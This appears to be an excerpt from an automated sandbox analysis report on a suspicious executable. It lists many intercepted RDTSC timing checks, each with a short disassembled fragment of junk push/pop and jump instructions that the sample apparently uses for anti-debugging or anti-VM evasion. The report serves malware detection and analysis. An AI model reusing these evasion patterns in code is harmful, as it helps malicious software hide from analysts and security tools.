Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F746 second address: A2F755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F755 second address: A2F76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F98991A2762h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2D82C second address: A2D858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9899183FF2h 0x00000009 jmp 00007F9899183FF5h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2DB60 second address: A2DB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F98991A2770h 0x0000000b jmp 00007F98991A2768h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2DDDE second address: A2DDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2E92C second address: A2E932 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F16E second address: A2F172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F172 second address: A2F182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F98991A2756h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A328E7 second address: A328EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A328EB second address: A3291A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007F98991A2756h 0x00000011 ja 00007F98991A2756h 0x00000017 jmp 00007F98991A2765h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DB1 second address: A32DB7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DB7 second address: A32DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DBD second address: A32DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9899183FE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DC7 second address: A32DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2765h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DE0 second address: A32E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F9899183FEEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F9899183FF4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32E0F second address: A32E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32E13 second address: A32E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A33146 second address: A3315D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Eh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A3359D second address: A335A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335A8 second address: A335AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335AC second address: A335CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335CB second address: A335CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335CF second address: A335D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A42FA5 second address: A42FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F98991A2756h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jo 00007F98991A2756h 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A415BC second address: A415C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A4205C second address: A42060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A38 second address: A48A42 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9899183FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A42 second address: A48A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A4C second address: A48A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A50 second address: A48A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A545DA second address: A54625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEBh 0x00000007 jmp 00007F9899183FEAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9899183FF6h 0x00000017 jmp 00007F9899183FF8h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A54625 second address: A54635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F98991A2758h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57B8D second address: A57B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57B91 second address: A57BB0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98991A2761h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57BB0 second address: A57BBF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9899183FE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57BBF second address: A57BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57709 second address: A5770F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A5770F second address: A57716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57716 second address: A57726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9899183FE6h 0x0000000a jl 00007F9899183FE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57726 second address: A57761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F98991A2769h 0x0000000e jmp 00007F98991A2761h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F98991A2756h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A5AEA6 second address: A5AEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F9899183FEFh 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A5AEBF second address: A5AEC9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98991A276Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A60EF0 second address: A60EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9899183FE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A67CD0 second address: A67CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A703AE second address: A703BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9899183FE6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A70241 second address: A70250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnp 00007F98991A2756h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75AA6 second address: A75ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75ABA second address: A75ADF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F98991A2769h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75DC7 second address: A75DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9899183FE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75DD3 second address: A75DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F98991A275Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75DE7 second address: A75E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F9899183FF5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75E03 second address: A75E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2765h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79F6F second address: A79F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79F74 second address: A79F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79F7B second address: A79F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79C3A second address: A79C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98991A275Dh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98991A2768h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79C68 second address: A79C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A86C95 second address: A86CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F98991A275Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A86CB5 second address: A86CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9899183FF3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A80419 second address: A80429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A80429 second address: A80458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F9899183FF7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A971A4 second address: A971AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A971AA second address: A971AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A972FD second address: A97316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F98991A2763h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A97316 second address: A9731C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9731C second address: A97347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2761h 0x00000007 push edx 0x00000008 jmp 00007F98991A2765h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A97347 second address: A97357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jg 00007F9899183FECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9EEDA second address: A9EF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 jmp 00007F98991A2765h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F98991A275Bh 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9EF19 second address: A9EF1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0BF second address: A9E0E7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98991A2756h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F98991A2761h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F98991A2758h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0E7 second address: A9E0ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0ED second address: A9E0F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0F1 second address: A9E0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0FC second address: A9E102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E35B second address: A9E379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9899183FF7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E379 second address: A9E391 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F98991A275Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9EBB4 second address: A9EBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9EBBC second address: A9EBCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F98991A2756h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9EBCB second address: A9EBCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA32D0 second address: AA32D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA34DC second address: AA34E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA34E0 second address: AA34E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA35A3 second address: AA3603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F9899183FF1h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jl 00007F9899183FF3h 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d jnc 00007F9899183FE8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c je 00007F9899183FE6h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA3603 second address: AA3607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA3607 second address: AA360D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA37E3 second address: AA37FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA37FF second address: AA3803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA3803 second address: AA3814 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F98991A2764h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA3814 second address: AA381A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA381A second address: AA389A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F98991A2758h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 sub dx, 8C61h 0x00000025 push dword ptr [ebp+122D341Eh] 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F98991A2758h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 pushad 0x00000046 jmp 00007F98991A2763h 0x0000004b movzx edx, bx 0x0000004e popad 0x0000004f call 00007F98991A2759h 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 jc 00007F98991A2756h 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA389A second address: AA38AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnl 00007F9899183FE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA53E4 second address: AA53E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: AA53E8 second address: AA53F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9899183FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
